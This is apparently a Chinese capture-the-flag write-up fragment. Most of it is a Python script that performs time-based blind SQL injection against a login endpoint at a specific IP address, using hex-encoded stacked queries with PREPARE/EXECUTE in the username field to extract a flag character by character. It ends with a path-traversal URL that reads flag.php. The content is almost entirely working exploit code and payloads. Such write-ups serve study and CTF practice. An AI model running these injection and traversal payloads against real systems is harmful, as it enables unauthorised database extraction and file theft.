注入脚本:
# coding=utf-8
import re
import requests
import sys
import binascii
import json
reload(sys)
sys.setdefaultencoding("utf8")
url = "http://182.92.220.157:11116/index.php?r=Login/Login"
flag = ""
def str_to_hex(s):
return ''.join([hex(ord(c)).replace('0x', '') for c in s])
for i in range(1, 40):
print(i)
for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.":
sql = "select if((ascii(substr((select group_concat(flag) from flag)," + str(i) + ",1))='" + str(
ord(str1)) + "'),sleep(5),2);" # ctf
sql_hex = str_to_hex(sql)
data = {
"username": "1\';SET @a=0x" + str(sql_hex) + ";PREPARE st FROM @a;EXECUTE st;",
"password": "admin\'"
}
try:
result = requests.post(url, json=data, timeout=4)
# print result.text
except requests.exceptions.ReadTimeout:
flag += str1
print(flag)
break
print(flag)结果是 AmOL#T.zip
下载下来是源码,进行代码审计
发现文件读取漏洞
http://182.92.220.157:11116/index.php?r=User/Index&img_file=/../flag.php
